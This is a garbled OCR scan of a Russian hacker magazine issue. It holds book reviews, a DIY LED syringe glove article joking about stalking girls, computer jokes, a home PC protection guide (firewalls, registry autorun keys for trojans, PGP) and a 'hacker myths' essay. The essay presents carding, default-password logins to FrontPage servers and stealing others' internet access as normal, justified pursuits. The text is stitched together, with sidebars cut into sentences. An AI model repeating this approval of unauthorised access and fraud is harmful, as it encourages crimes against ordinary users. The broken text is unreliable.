Как хороший пример (в отличие от вышепри- 
веденных плохих примеров) - одна из серьез- 
ных книжек по сетевой безопасности, которая 


за теорией не забывает о практике. Хорошо 
структурирована, сверстана, иллюстрирова- 
на. Рассчитана на серьезных дядей - специа- 
листов. Тугая штука. 

Рекомендуем всем серьезным дядям на свете, а 
также тем, кого задрали эти дяди. 


ЗАЩИТА ИНФОРМАЦИИ 
в компьютерных 
системах 


Мельников В.В. Защита информации в 
компьютерных системах. М., Финансы и 
статистика, 1997. - 368 с. 


Ну и, напоследок, учебник по предмету “За- 
щита информации”. Конечно же, попадают- 
ся интересные вещи, и вообще наука это 


Главный каталог ГПНТБ. 


полезная, бла-бла-бла... Только больно уж 
все в глобальных масштабах, и к живому 
взлому имеет весьма слабое отношение. 
Фигня, короче, полная. Рекомендуем сту- 
дентам всяких спецвузов. Желаем этим свя- 
тым людям не расставаться со своей баш- 
ней надолго. Также рекомендуем тем злоб- 
ным преподам, которые любят терроризи- 
ровать своих студентов. 


Вывод 


Как ты уже, наверное, догадался, книжки 
вряд ли помогут тебе стать хакером. А чте- 
ние некоторых из них даже может нанести 
непоправимый вред твоему психическому и 
физическому здоровью. Более того, какой 
вред эта статья принесет Юликсу с Федик- 
сом, можно только гадать. Представь, какая 
толпа плагиаторов уже гоняется за нами! 

А чтобы стать хакером, тебе нужно искать и 
изучать серьезную документацию по кон- 
кретным темам. Не бывает полных универ- 
салов, бывают профессионалы в своей об- 
ласти, которые кажутся чайнику богами. Ты 
тоже можешь стать таким же. А пока... Нач- 
ни, например, с текстового архива на 
www.astalavista.com - уверяю тебя, любая 
свежая текстушка оттуда принесет тебе ку- 
да больше пользы, чем последовательное 
чтение всех этих книжек. 


Увидимся в ГПНТБ =). 
Твои книжные черви. 
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floHopa 


Доктор ДовБРЯНСКИЙ (DR.COD@xXAKEP.RU) 


Знаешь ли ты, кто такой Донор? Если ты уже читал 
в предыдущем спеце статью "Оральный свет”, то, 
конечно же, знаешь. Так вот, этот охотник до моло- 
деньких девственниц жутко проперся от перчатки 
Фредди Крюгера. И захотелось ему такую же, 
только со шприцами на пальцах. Зачем? Спроси у 
него - он тебе об этом подробно расскажет, а мо- 
жетеще и покажет на твоем же примере :). 


Продукт социальной инже- 
нерии 


Так вот, пожаловал однажды Донор в аптеку, 
стал шприцы на пальцы мерить. Продавщицы 
жутко пугались: мол, нельзя шприцы примерять, 
одноразовые они. Но, прочитав занемевшим те- 
тям лекцию о защите прав потребителя и вреде 
курения, Донор продолжил свой променад в ма- 
газине “Ткани”. 

В итоге готовая перчатка была отдана мне на 
электрификацию. Теперь любой кровавый 
потрошитель может не волноваться о том, что 
темно и не видно, куда колоть. Плюс - ультра 
яркие светодиоды оказывают на жертву прос- 
то-таки гипнотический эффект. Некоторые 
даже думают, что это лазеры. Кстати, перчат- 
ка великолепно работает в блоке с зизюкай- 
дером. 


Как это сделать 


Прежде всего ты должен найти светодиоды на 
2,5 вольт. Бери с максимальной мощностью, 
лучше красные. Бывают и других цветов, но 
они сильно проигрывают в яркости. Так что 
если ты собрался гоняться за молоденькими 
девственницами по более-менее освещенным 
улицам или дискотекам, бери красные. Если 
тебя более привлекают подвалы, темные 
подъезды или даже лесные и лесопарковые 
массивы, то смело можешь подбирать цвет, 
наиболее подходящий твоему имиджу. 

Диаметр светодиодов бери максимальный: 10 
мм. Вся хитрость в том, чтобы закрепить эле- 
мент внутри шприца, Для этого вытащи пор- 
шень и его плоскую часть проткни ножками 
светодиода. Если ноги светодиода слегка ра- 
зогреть паяльником, то они с легкостью вой- 
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Disclaimer 


Перчатка сделана 
исключительно 
для украшения 
Донора и ночного 
клубления. Дан- 
ный продукт не 
может быть ис- 
пользован в ка- 
честве оружия. 
Вообще мы с До- 
нором против на- 
силия и наркоти- 
ков, если это не 
по делу. Да 
здравствует сво- 
бодная любовь с 
техногенными 
элементами! Да 
здравствует со- 
циальная инже- 
нерия! 


дут в пластмассу. Чтобы надежней держа- 


лось, можно капнуть пару капель клея “Мо- 
мент”. 


if a 


Крепление светодиода 


После того как ты вмонтировал во все поршни 
светодиоды, аккуратно припаяй к их ножкам 6e- 


лые проводочки. Длинная нога элемента идет на 
плюс батареи. Внутри перчатки провода от оди- 
наковых ног надо соединить вместе и замотать 
скотчем. Получится два вывода на плюс и минус. 
Соедини последовательно три пальчиковых 
батареи на 1,5 вольта, и замотай их скотчем. К 
ним еще удобно примотать выключатель или 
регулятор яркости. 


Мануал 


Если ты собрал свою перчатку аккуратно, то 
шприцы вполне можно наполнить какой-ни- 


будь жидкостью: например, водой с аква- 
рельными красками. Однако и без воды пер- 
чатка выглядит достаточно внушительно. 
Особенно приятно то, что ультра яркие свето- 
диоды отбрасывают кровавые зайчики на сте- 
ны и пол. Перчатку можно использовать и как 
фонарик. 

Переключатель с батарейками удобно дер- 
жать в другой руке, чтобы свет можно было 
внезапно включить или выключить в зависи- 
мости от оперативной обстановки. Советую не 
использовать иглы, т.к. можешь уко- 

лоться сам либо уколоть подругу. 


MR. FALSE: MR_FALSE@MAIL.RU 


Пресс-релиз компании “Кока- 
Кола”, Москва, 2001 год. 
Уважаемые покупатели! 

В связи с феноменальным успе- 
хом нашей последней акции 
“Кликни Деда Мороза!” в новом 
году мы планируем проведение 
двух новых аналогичных акций: 
“Декомпрессь Деда Мороза” и 
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АНЕКДОТЫ 


о Чана _ 


Заявление директору пивзавода “Клин- 
ский” от группы программистов и веб- 
мастера: 


“Просим Вас предоставить выделенную 
линию со скоростью 0,5 л/секунду для 
служебных целей”. 


“Форматни Снегурочку”. 


Приходит мужик в ком- 
пьютерный салон: 

- Драсьте, я TyT y Bac 
вчера комп покупал... 

- И чего? 

- Сгорел. Вчера сгорел. 
- Ну, давайте гарантийку. 
А что у вас сгорело? 

- Все! 

- Хмм. Ну хоть камень 
цел? 

- Сгорел. 

- А винт? 

- Сгорел. 

- А мамка? 

- Сгорела. 

- А монитор? 

- Сгорел. 


- Екерны бабай! Что же 
вы с ним делали? 

- Дау меня пожар вчера 
был... 


Лежат двое 
влюбленных в 
постели после 
первой ночи. 
Она: 

- Милый, аты 
помнишь, когда 
мы с тобой поз- 
накомились? 
Он: 

- Погоди... ща 
отдыщшусь и 
пойду хистори 
в аське посмот- 
рю. 


Ищу поклонников Microsoft. Найду - убью. 


В свои 19 лет он знал 7 
OCen... 
И ни одной женщины. 


Сидят два хакера. Один чи- 
тает объяву в журнале: 

- Красивая девушка. 
90x60x90. Выполнит все 
твои желания. Плата - 50$ 
за ночь. 

Второй: 

- А со скольки у нее ночь? 


Народная примета: если программист в семь 
утра уже на работе - значит, онеще на работе. 


Сидят два хакера. 
Один читает объяву 


Земля, 2050 год. 
Генетический прог- 
раммер разбирает 
генную последова- 
тельность и видит 
комментарий: 

// Aeti geny nado 
ubrat na fig. 
Archangel Gavriil // 


Приходит хакер домой, к He- 
му подбегает кошка и начи- 
нает усиленно ластиться, под 
руку сама лезет. Жена спра- 
шивает: 

- Чего такое с кошкой? Чего 
она к руке-то лезет? 

- Как чего? Мышкой пахнет... 


в журнале: 
- Красивая девуш- 
ка. 90x60x90. Вы- 
полнит все твои же- 
лания. Плата - 50$ 
за ночь. 

Второй: 

- А со скольки у нее 
ночь? 
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Летят Холмс с Ватсоном Ha воздушном шаре. И 
спят в полете. Просыпаются над какой-то нез- 
накомой землей, видят - внизу какой-то хрен 
коров пасет. Снизились они и спрашивают му- 
жика: 

- Скажите, сэр, где мы находимся? 

- На воздушном шаре. 

- Спасибо, сэр! - и летят вверх. Холмс задум- 
чиво говорит: 

- Интересная местность, Ватсон! Программист 
пасет коров! 

- Холмс, а с чего вы взяли, что он програм- 
мист? 

- Это элементарно! Во-первых, он долго думал 
над ответом. Во-вторых, его ответ был абсо- 
лютно точен. И в третьих - абсолютно бесполе- 
зен! 


Когда нормальный человек, уезжая из дома, 
одевает на жену пояс верности, веб-дизайнер 
ставит на нее счетчик... 


Windows - слово из 
языка индейцев. В 
переводе означает 
“Белый человек, 
глядящий через 
стеклянный экран 
на песочные часы.” 


Веб-мастер, глядя 
на системный 
блок:: 

- Вот, блин, что-то 
со счетчиком, уже 
третий раз “333”! 


Один наш общий знакомый добрался до 
КЗОТа, и хакнул базу данных в онлайне - 
нашел интереснейшие вещи! Вот какие 
есть у нас в стране профессии - 
называется, “найди себя” =). 
Аппаратчик мокрой классификации 
Артист ритуальных услуг 

Аэрографист щипковых инструментов 
Бригадир двора изложниц 

Варщик шубного лоскута 

Вздымщик 

Выгребальщик костров 

Главный обогатитель 

Главный специалист по технике 
консервации телевизионных 

программ 

Давильщик 

Делильщик кружев 

Демонстратор пластических поз 
Диспетчер по рулению 

Долбежник 

Завивальщик спиралей 

Заготовщик черни 

Загрузчик мелющих тел 

Заливщик голосовых планок 

Запарщик коконов 


Телефонный звонок про- 
вайдеру: 

- У меня опять проблема. 
- Что, не можете войти? 
- Войти удалось, но со- 
сать не хочет! 

- Хм. Мы не виноваты - у 
нас канал широкий... 

- Причем здесь канал?! С 
кем я говорю? Это теле- 
фон доверия? 


Познакомился интернет- 
чик с девушкой, погуля- 
ли, они спрашивает: 

- Как бы нам еще встре- 
титься? 

Она ему на бумажке Te- 
лефон написала и уеха- 
ла. Он смотрит на бумаж- 
ку: “Ha ICQ не похоже... 
Ha IP Toxe...”. 

Так и не состоялась лю- 
бовь. 


Хакер орет на жену: 

- Ты изменяла? 

Жена: 

- Ах ты паскуда, кобелина, да 
как ты такое мог подумать! 
Х:- Нет, лучше сразу скажи, 
ты изменяла? 

Ж:- Да харош тебе, просто 
чушь! 

И: - Если я узнаю, что изме- 
нила - урою! 

Ж: - Скажи мне, что случи- 
лось? 

И: Что-что! В сеть войти не 
могу, сервак выдает: “Про- 
верьте имя пользователя и 
пароль”! Не мог же он сам 
измениться! Стерва! Ты из- 
меняла? 


Один новый русский втолко- 
вывает другому по телефону, 
как фоновый экран монитора 
в малиновый цвет покрасить: 
-...А теперь жми “ОК”. 

- Нажал. Слушай, тут предла- 
гают перегрузиться. Согла- 
шаться? 

- Не сразу. А то какой ты ав- 
торитет после этого! 
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дорово, кул-хацкер. Я вижу, ты уже 
3 научился издеваться над другими и 

сейчас ищешь, как говорится, врагов 
себе на одно место. В наше время каждый ла- 
мер имеет различные сетевые экраны, бран- 
дмауры и другие проганутые фичи, которые 
защищают его от твоих напастей. Но фишка- 
то в том и заключается, что юзеры часто не 
умеют правильно настраивать свои проги. Вот 
здесь ты, в отличие от большинства, и должен 
проявить все свое мастерство и свою, так ска- 
зать, хакерскую сноровку - поверь, потрачен- 
ное на настройку твоей личной компьютерной 
защиты время даром не пропадет. А то, не 
дай Бог, нарвешься в своих диких атаках на 
админа... И тогда - если твоя защита будет 
несовершенной - не просто обломаешься, но 
и ответишь за все содеянное. Короче: я рас- 
скажу тебе сегодня про средства защиты :). 


Брандмауры 


Если ты изучал в школе информатику, то мно- 
гому тебя научили еще тогда, в далекие со- 


При вражьем подклю- 
чении прога будет вы- 
давать тебе гудок или 
зверский вой. Старая, 
но вполне хорошая фи- 
ча такого типа - 
NukeNabber. Она поз- 
воляет отслеживать 
обращения к портам 
твоей машины. 


ветские времена. Построение сети и маршру- 
тизацию изучал? Глобальные сети строятся из 
больших локальных, эти большие локальные 
из маленьких локальных, а те, в свою оче- 
редь, из конкретных машин. И таким иерар- 
хическим образом твой любимый инет захва- 
тил (или охватил - кому как больше нравится) 
всю нашу планету. Каждая машина в сети 
имеет свой идентификатор под названием IP- 
адрес. Это строка цифр, размером 4 байта, 
состоящая из двух частей. Вот типичный при- 
мер: 

213.24.60.3 

Заметь, состав - четыре триплетных числа, 
разделенных 3-мя точками. Максимум числа 
может быть 256. Первая часть IP 213.24 - 
формирует сетевой сегмент ака локальную 
сеть, то есть с помощью этих двух цифр по 
инету разыскивается локалка, в которой ты 
сидишь. Именно ориентируясь на эти первые 
два числа, работают роутеры, или, по-русски, 
маршрутизаторы. Вторая часть этих цифр 
формирует идентификатор твоей машины. Та- 
ким образом, происходит обозначение машин 


в сети. А теперь пораски- 
нем башкой: большие 
корпоративные сети сос- 
тоят из большого коли- 
чества подсетей и уда- 
ленных машин, причем 
сеть организована так, 
чтобы проникать в нее 
могли только те машины, 
которые действительно 
ей принадлежат. Ты ска- 
жешь: “Ну как же это ор- 
ганизовать?". А очень 
просто! Нужно пользо- 
ваться Брандмауэрами, 
или firewallamu. Это такие 
проги, которые, когда к 
ним поступает запрос на 
транзакцию (читай: об- 
мен данными), сначала 
ползут в базу данных, где 
подробно расписано, ка- 
кие машины принадлежат 
данной сети, а какие нет. 
И если тебя, великого 
кул-хацкера, не окажется 
в списках, то тебе выда- 
дут: Access Denied! В об- 
щем, обрубят. Если не ве- 
ришь - сходи на 
www.usa.gov :). Так что, 
если ты сидишь в локале, 
особенно советую приоб- 
рести такую прогу, кото- 
рая пустит всех твоих вредоносных дружков 
по бороде. FireWall - рулез намбер ван форей- 
вер! 


Проги для отслеживания 
атак на определенные порты 


Узнав твой IP (это сделать очень легко, уж 
поверь мне на слово), эти же друзья захотят 
над тобой поиздеваться и вырубить твой 
комп. Или стырить твой и без того честно оп- 
лачиваемый аккаунт =). Суть вот в чем: зная 
IP, люди с помощью сетевых сканеров сканят 
твою машину на открытые порты. Открывают 
телнет, пролезают на твою тачку и имеют ее 
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во все дыры. Вот они и тебя поимеют, если 
заранее не позаботишься о своей безопаснос- 
ти и не установишь себе прогу, 

которая будет сканить твои порты на подклю- 
чения. При вражьем подключении прога будет 
выдавать тебе гудок или зверский вой. Старая, 
но вполне хорошая фича такого типа - 
NukeNabber. Она позволяет отслеживать обра- 
щения к портам твоей машины. Прога является 
резидентной, ака постоянно в оперативке. При 
попытке атаки на тебя она не только предупре- 
дит тебя об этом, подав какой-либо сигнал, но 
и напишет классный лог, где будет записано, 
кто на тебя нападал (а зная это, отомстить ты 
уже сможешь). 


Настройки интерпретируе- 
мых языков 


Совсем еще молодые языки - такие, как Java 
и JavaScript, и иже с ними другие межсетевые 
интерпретаторы, способны творить чудеса с 
твоей машиной, если не отнестись к ним 
серьезно и не позаботиться об их тотальном 
контроле. С помощью данных интерпретато- 
ров можно поюзать твой комп, захачить твои 
пароли или просто визибильно поприкалы- 
ваться :). Но сейчас наше дело не прикалы- 
ваться, а предотвратить эти приколы. Для 
этого надо покопаться в настройках браузе- 
ра. Можно разрешить Java или частично раз- 
решить его (хотя, если хочешь, можешь его 
вообще вырубить, но некоторые страницы в 
инете из-за этого будут выглядеть некоррек- 
THO). Также можно отрубить страшную вещь 
под названием cookie. Или еще куда более 
зловещую вещь под названием Activex. 


Правила безопасности 
Настройка: 
J ay, а 
$ Разрешения Java 
<) Высокая безопасность 
© Низкая безопасность 
© Отключить язык Java 
© Специальная 
© Средняя безопасность 
123 Загрузка 
| [85 Загрузка файла 
© Отключить 
<) Разрешить 


[1% Загрузка шрифта 


© Отключить 
— п PO ме re 


Восстановить прежние правила 


дерский, а далекий америкосский или зим- 
бабвийский :). 

Также в сети есть огромное количество служб 
типа www.anonimizer.com. В большей степени 
они платные, но есть всякие триалы и все та- 
кое... Короче: позаботься о непрозрачности 
твоей прокси! И атака на тебя будет затруднена. 


Настройка удаленного дос- 
тупа к принтерам и винтам 


Также надо позаботиться о своем винчестере 
и принтере, чтобы каждый, кому ни лень, не 
скачивал твой пароль и не расходовал твой 
принтерный картридж =). 

Сделать это довольно легко: ползем в “Па- 
нель управления->Сеть->Доступ к файлам и 
принтерам" и... убираем там все галочки. Ме- 
тод достаточно прост - в связи с этим настоя- 
щие хакеры обойдут и это, так что будь бди- 
телен. 


‘науровень: [Средний "| Восстановить | 


Настройка прокси и сетевых 
анонимайзеров 


Есть такая хорошая вещь под названием 
прокси, которая пропускает твой траффик че- 
рез другую машину, в связи с чем меняется 
IP, что усложняет атаку на тебя другими звер- 
скими юзверями =). Но надо помнить, что 
прокси надо выбирать не родимый провай- 
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Г. Patino этого компьютера можно сделать общими. 


J” Принтеры этого компьютера можно сделать общими. 


]. Отмена | 


SINTEZ (SINTEZ@XAKEP.RU) 
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ак уж получилось, что вокруг ха- 
| керского ремесла постоянно скла- 
дываются какие-то легенды и ми- 
фы. Причем, что меня колбасит сильнее 
всего - так это то, что мифы эти сочиняют 
не только обыватели, но и люди, прибли- 
женные к сцене. Впрочем, что тут болтать, 
поехали... 


1. Хакеры проникнут куда 


угодно 


Ну да, конечно! Особенно под юбку твоей 
подружке. Да дерьмо все это. Как гово- 
рится, на любого умника всегда найдется 
парнишка поумнее. И каким бы крутым 
хакер ни был, всегда найдется супер-ад- 
мин, который его и обломает. Примеры? 
Их тысячи. Впрочем, любой хакер, кото- 
рого взяли либо про которого ты знаешь, 
- яркий пример. 


2. Все, кого мы знаем 
как хакеров, - лохи. Про 


настоящих хакеров мы не 
слышим и никогда не ус- 
лышим 


Как говорил мой любимый Джеймс Бонд: 
“Никогда не говори никогда”. И вообще, 
это заявление попахивает всякими мифами 
о секретных службах, бывшими очень по- 
пулярными во времена социализма. Тогда 
тоже постоянно говорили: “У них есть та- 
кие вещи, о которых мы даже подумать не 
можем”. Идеальных хакеров нет. Как нет 
идеальных плотников или цирюльников. 
Ошибаются все. 

Другое дело, что чья-то ошибка проходит 
незамеченной, а чья-то, как назло, проя- 
вилась в ненужное время и в ненужном 
месте. Так что “узнаем - не узнаем” - это 
дело времени. Если только удачливый ха- 
кер не решит соскочить и заняться мир- 
ной профессией, почуяв реальную опас- 
HOCTb. 
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И если тебя, великого кул-хацкера, не ока- 
жется в списках, то тебе выдадут: Access 
Denied! В общем, обрубят. Если не веришь - 


сходи на WWW.USAa.gOV : 


Конфигурация | Компьютер | Управление доступом | 


В системе установлены следующие компоненты: 


Клиент для сетей Microsoft 
Клиент для сетей NetWare 


Контроллер удаленного доступа 
|РХ/5РХ-совместимый протокол 


NetBEUI 
ТСРАР 


Добавить... | 


Способ енода в сеть: 


Клиент для сетей Microsoft 


Удалить 


Свойства 


Доступ к файлам и принтерам... 


Описание 


Антивирусы 


Тебе уже все уши прожужжали насчет анти- 
вирусов? Если еще нет, то сейчас я прожуж- 
жу. Антивирусы часто спасают от различных 
проблем - поэтому, получая чего-то из сети, 
советую все это тщательно просканить, и 
лучше не одним антивирем, а сразу несколь- 
Кими. 


Проверка реестра 


Всякие трояны, если и прорвутся в твой 
комп через инет и твои антивиры, все равно 
вычисляемы, Берешь и смотришь в реестре 
указанные ключи на подозрительные проги 
(для тех, кто в танке: реестр - огромная ба- 
за данных виндов, поиметь ее можно из ди- 
ректории %WinDir, запустив regedit.exe): 


HKEY_CURRENT_USER\SOFTWARE\MICROSOFT 
\WINDOWS\CURRENTVERSION\RUN 
HKEY_LOCAL_MACHINE\SOFTWARE\- 
MICROSOFT\WINDOWS-\CURRENTVER- 
SION\RUN 
HKEY_LOCAL_MACHINE\SOFTWARE\- 
MICROSOFT\WINDOWS-\CURRENTVER- 
SION\RUNSERVICES 
HKEY_USERS\.DEFAULT\SOFTWARE\- 
MICROSOFT\WINDOWS-\CURRENTVER- 
SION\RUN 


Прием и анализ почты 


Каждое письмо надо воспринимать как потен- 
циальную атаку - особенно, если ты сам один из 
сетевых воинов - Маклаудов :). Поэтому, если 
тебе нужна стопроцентная безопасность, юзай 
мейлеры типа ВАТ, которые транслирует исход- 


ник из HTML в простой текст. Потому что именно 
в HTML и вставляются апплетики Ha JAVA и дру- 
гие фичи, которые могут попортить тебе нервы. 


Также надо подумать о сетевых червях - тут по- 


могут почтовые плагины от известных антиви- 
ров, которые сканят твой ящик на вири. Еще со- 
ветую записать все [Р своих друзей и работать по 
принципу брандмауэра, проверяя каждое пись- 
мо: подписаться можно кем угодно, а вот подде- 
лывать IP умеют не все. Слава БОГУ :)! 


Криптография 


И, наконец, последний пунктик. Ты, конечно, 
наслушался, что криптография - это рулез фо- 
рейвер, и усё такое, Но далеко не все крипто- 
системы надежны. 

Если тебя заинтересует эта тема, то советую 
набрать кучу книг по дискретной математике, 
основам кодирования информации и крип- 


тоалгоритмам, Если ты хочешь, чтобы твою 


почту смотрели только те, кому она предназ- 
начается, то юзай криптосистемы с двойным 
ключом, типа РСР. Думаю, в ближайшее время 
не изобретут что-то более крутое. Очень хо- 
роши плагины из новой 7-й Пыгыпыхи для 


твоей тети Аси и, конечно же, мэйлера. 


Вот, пожалуй, краткий перечень средств, с 
помощью которых можно обезопасить свой 
комп от различных сетевых извращенцев и 
недоумков. Главное в нашем деле - предви- 


деть будущее, хоть ненадолго, и не нарывать- 


ся на всех подряд. А то гляди - попадешь на 


W 


злого админа... 


Будь бдителен, короче, Удачи! 


©О-ых 


Появились первые мини-ЭВМ. 
Интерес к компам возрастал. Они 
уже активно юзались в производ- 
стве, в статистических исследо- 
ваниях, в образовании. Компью- 
теры начинают использовать как 
средство для хранения архивов 
данных (ZIPbI, о которых ты по- 
думал, здесь ни при чем :) - я 
имею в виду доисторические ба- 
зы данных). Большой интерес к 
компам и ко всему, что с ними 
связано, начинают проявлять 
студенты старших курсов. Это не 
случайно, ведь именно на базе их 
универов организовывались те 
самые лаборатории, где велись 
разработки компов. 
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1. Хакеры проникнут куда угодно 
2. Все, кого мы знаем как хакеров, - лохи. 
Про настоящих хакеров мы не слышим и ни- 


когда не услышим 


3. Хакеры - это такие люди с длинными воло- 
сами, немытые, худые, с красными глазами, 
с утра до вечера сидящие перед монитором 
4. Хакеры работают только на Юниксе 

5. Ломают всегда через Интернет - либо 
трояном, либо эксплоитой 

6. Взлом - это когда меняют главную стра- 


ничку на сервере 


7. Хакеры - это компьютерная молодежь 
8. Русские хакеры самые крутые! 
9. Хакеры что-то ломают, чтобы выпен- 


дриться 


10. Хакеры тупые, замороченные, заком- 
плексованные, неразговорчивые люди 


3. Хакеры - это такие люди 
с длинными волосами, 


немытые, худые, с красными 
глазами, с утра до вечера 
сидящие перед монитором 


Кто бы сомневался! А капитаны дальнего 
плавания все курят трубки и носят усы. Ты 
пойми, что все эти стереотипы - навеянный 
газетами образ. А самое интересное, что в 
большинстве газет вообще понятия не 
имеют, кто такие хакеры. Вот наш журнал и 
развеивает все такие мифы уже в течение 
2-х лет. Все просто, хакеры - разные. Одни 
клубятся, коротко стригутся, 
красят волосы в оранжевый 
цвет и одевают Dr.Martens на 
толстой подошве. Другие ходят 
на концерты в Горбушку и носят 
косухи, пробитые металлом сни- 
зу доверху. А третьи - эдакие 
пай-мальчики, ну просто ма- 
менькины сыночки. И никто не 
знает, что все эти ребята де- 
лают в свободное время со 
своими компами. 


4. Хакеры работают 


только на Юниксе 


Это очень распространенный 
миф. А все дело в том, что по- 
шел он от “анти-майкрософтов- 
ской” темы. Было “типа модно” 
не любить М$ и тащиться от 
*никсов. Причем, большинство 
людей, орущих “M$ - 
MustDie!!!”, вообще в глаза ни- 
чего, кроме Windows, не видели. 
Эти люди даже под DOS-om не 
работали (т.к. маленькие еще 


были). А так как кроме Windows и Unix они 
ничего не знали, поэтому ответ на вопрос 
“что же круче” для них, был очевиден. 

Хотя надо признать, что ДОЛЯ истины в 
этом мифе есть. Все-таки *никсы со всей 
своей дырявостью позволяют делать такие 
вещи, которые виндам не по силам. И ког- 
да хак происходит эксплоитом, то из-под 
*никсов. Но не надо забывать про 05/2, 
про те же Винды, про социальную инжене- 
рию ит.д. Да и, к тому же, все хакеры, ко- 
торых знаю я, работают на нескольких сис- 
темах, и Винды - одна из них. Простейший 
взлом из-под Виндов: подключиться к 


миФОЛОГИЯ 


фронтпейджевскому серваку и ввести де- 
фаулотовые пароли. Админ забыл их поме- 
нять? Ну что ж, вот его и хакнули. И из-под 
Виндов, заметь. 


5. Ломают всегда через 


Интернет - либо трояном, 
либо эксплоитой 


Ох, как же моден Интернет! Ну просто хит! 
Настолько моден, что люди уже совсем за- 
были про оффлайн. А ведь те, кто помнит 
историю (у нас ведь об этом номер, прав- 
да?), вспомнят, что давным-давно кардин- 
гом люди занимались с помощью треша 
(мусора), копаясь в мусорных баках мага- 
зинов и банков, и находили копии слипов 
от проводок по кредам. Многие должны 
помнить истории про взломы с помощью со- 
циальной инженерии, когда комп использо- 
вался только на последней стадии. Ну и хит 
сезона - физический взлом сервера, когда 
ты приходишь, садишься на машину, на ко- 
торой крутится сервер, и делаешь с ним 
все что угодно (например, выключаешь из 
розетки). Отсюда следующий миф. 


6. Взлом - это когда 


меняют главную страничку 
на сервере 


Нет, бабка, когда меняют главную страничку 
на сайте - это дефейс, о нем в нашем Спеце 
даже отдельная статья есть. Запомни: взлом - 
это не обязательно взлом сервера. Можно 


Раньше 5О-ых 


В самом начале были огромные неуклюжие машины (назвать их компами - 
язык не поворачивается), над которыми работали зрелые люди в белых ха- 
латах и с отвертками в руках. Заметил тонкость? Не “за которыми работали”, 
а именно “над которыми работали”. Компы тогда еще только-только разраба- 
тывались, и перцы, работающие с ними, большую часть своего времени про- 
водили, копаясь внутри. А людьми этими были обычные ученые - физики, ма- 
тематики, механики, электронщики. Про них не говорили “компьютерщик”, 
так как понятие “компьютерщик” еще не успело выделиться как таковое. Еще 
раз повторяю, это были просто ученые, которым выпала участь работать с но- 
вым тогда явлением - с вычислительными машинами. И уж, конечно, они ни- 


как не были хакерами. 


тающего с компом. 


взломать мобильный телефон босса или за- 
щиту от копирования на CD. И вообще, поня- 
тие взлом - это проникновение туда, куда 
“посторонним вход запрещен”. Вот и все. 
Поэтому даже пройдя в Макдональдсе за 
дверь “Stuff Only”, ты таким образом взло- 
маешь Мак. И неважно, придержал ли ты 
дверь ногой за последним выходящим или 
подключил свой Palm к компьютерному замку 
на двери и хакнул код, или приставил охран- 
нику к виску гранатомет “Муха”. Это все - 
способы взлома. Но в любом случае ты достиг 
своей цели. А способы у всех разные. 


7. Хакеры - это компьютер- 


ная молодежь 


Хороший миф. Мне он нравится. Пусть бу- 
дет так! Хотя в реальности дело обстоит 
по-другому. О молодежи больше пишут, го- 
ворят и т.д. Просто потому, что она безба- 
шенная и готова светиться. А вот 40-летние 
дядьки, работающие на OCB и взламываю- 
щие коды к стратегически важной инфор- 
мации, об этом журналистам рассказывать 
не будут. Поэтому их, типа, нет :). Правда, 
Константин Григорьевич? Вас нет. Вы - 
тень. 


8. Русские хакеры самые 


крутые! 


Ну да, а Париж - законодатель моды. Нет, ре- 
бята, законодатель моды - Лондон. Ну да не 
важно, мы не о моде. Ситуация здесь такова: 
15 лет назад компьютеров дома почти ни у 
кого не было. Ко мне ходил весь двор поиг- 
рать в собственноручно собранный Spectrum 
и привезенный из Англии Commodore. А в 
штатах были. Там вообще люди побогаче жи- 
ли. И подарить любимому чаду на день рож- 
дения комп было очень модно. А я в то время 
ходил во всероссийский центр вычислитель- 


Конец 5О-ых - начапо 6©О-ых 


У программистов появляется неизменный атрибут - очки с толстыми оптическими стеклами. Начали появляться первые из 
тех, кого я бы назвал прародителями хака. Серьезные взрослые люди, ученые, проработавшие полжизни с компами, - про- 
фессиональные программисты. Работали с такими языками, Kak Assembler и Fortran. Ими были разработаны первые опера- 
ционки. Эти люди сами ничего не хакали, просто они, общаясь между собой, начали формировать тот компьютерный жар- 
гон, ту культуру, те отношения, на которых потом созрело хакерство. Они же установили стереотип человека, много рабо- 


ной техники, где стояло 40 Роботронов, 20 
Apple и несколько чудес отечественного ЭВМ- 
строения. Сами понимаешь, что мне приходи- 
лось изучать эти машины, чтобы на них рабо- 
тать, и мы на них именно работали, а не в иг- 
рушки играли. Вот и получалось, что в “сов- 
ке” на компах работали только профи, а за 
границей - все кому не лень. И именно поэто- 
му наши хакеры и были профессиональнее. 
Хотя, при всем уважении к отечественному 
взлому, напомню, что в тех же Штатах нор- 
мальные компы тоже стояли по университе- 
там и исследовательским центрам, где за мо- 
ниторами тоже не лохи сидели. Только шта- 
товским ребятам не надо было проги ломать, 
они их и купить могли, а мы не могли. Во-пер- 
вых, они y нас не продавались официально, а 
если бы и продавались, то нам бы денег не 
хватило все это покупать. А во-вторых, в шта- 
тах, если бы узнали, что работник на рабочем 
месте проги ломает, а не делом занимается, 
то уволили бы сразу, а там за рабочее место 
держались зубами. Как у нас сейчас. 

Но прошло время, и все встало на свои места. 
Теперь и у нас лохов полно, которым мамоч- 
ка РС на Новый год подарила и которые уже 
считают себя мега-ультра хакерами. Так что 
на данный момент “лучших” нет. С развитием 
Инета хакерство стало реально интернацио- 
нальным, и многие группы объединяют людей 
со всего мира. 


9. Хакеры что-то ломают, 


чтобы выпендриться 


Бывает и такое. Но такой расклад чаще всего 
у юнцов, которым еще нужно доказать СЕБЕ, 
что они хакеры. Нормальные же люди взла- 
мывают что-то из-за нужды. Один чел играл в 
гамес и застрял на 12 уровне. Бился, бился - 
никак. Задолбался, залез отладчиком в игру и 
перекинул себя на следующий уровень, а 
заодно и горячую клавишу прописал, чтобы в 
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следующий раз проще было. Вот так игрушка 
и оказалась поломанной. А другому денег на- 
до, родители у него бедные, комп собрал из 
барахла, да и не комп это даже, а старье. Вот 
он и начинает кардить потихоньку либо за- 
щитки поламывать за деньги. Третьему в Инет 
очень нужно, а денег нет. Пришлось кому-то 
Инетом поделиться. Только этот “кто-то” о 
своем добром поступке даже не догадывает- 
ся. Ну и т.д. Т.е. просто так ломают редко, 
только когда реально делать нечего. Обычно 
же за взломом стоит какой-то нормальный мо- 
тив, а не “вот я какой!". 


10. Хакеры тупые, заморо- 


ченные, закомплексован- 
ные, неразговорчивые люди 


Ну да, тупые. Ты вон такой умный - пойди, 
напиши для демо-пати интру в 512 байт, 
которая бы еще и победила. Любой ком- 
пьютерщик, а уж тем более программист, 
обладает очень хорошим алгоритмическим 
мышлением. Оптимизировать код - самая 
главная работа кодера. 
Закомплексованные? Ну, это вообще очень 
распространенный наезд. Обычно так вы- 
пендриваются, показав тем самым “Ты весь 
в комплексах, а вот я нет! Меня мама ни- 
